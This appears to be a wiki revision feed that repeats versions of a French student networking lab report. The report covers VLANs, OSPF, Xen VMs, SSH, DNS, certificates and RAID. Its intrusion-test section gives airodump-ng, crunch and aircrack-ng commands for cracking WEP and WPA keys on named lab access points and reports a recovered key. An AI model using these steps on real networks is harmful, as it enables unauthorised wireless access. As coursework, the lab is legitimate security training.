                         )&lt;br /&gt;
          IN      NS      ns.anosteke59.site.&lt;br /&gt;
          IN      NS      ns6.gandi.net. &lt;br /&gt;
 www      IN      A       193.48.57.182&lt;br /&gt;
 ns       IN      CNAME   WWW&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57688</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57688"/>
				<updated>2022-01-10T15:53:05Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 1H&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site (&lt;br /&gt;
                         12      ; serial number YYMMDDNN&lt;br /&gt;
                         1H           ; Refresh&lt;br /&gt;
                         1H            ; Retry&lt;br /&gt;
                         1D          ; Expire&lt;br /&gt;
                         1H           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
          IN      NS      ns.anosteke59.site.&lt;br /&gt;
          IN      NS      ns6.gandi.net. &lt;br /&gt;
 www      IN      A       193.48.57.182&lt;br /&gt;
 ns       IN      CNAME   WWW&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57687</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57687"/>
				<updated>2022-01-10T15:52:52Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 1H&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site (&lt;br /&gt;
                         12      ; serial number YYMMDDNN&lt;br /&gt;
                         1H           ; Refresh&lt;br /&gt;
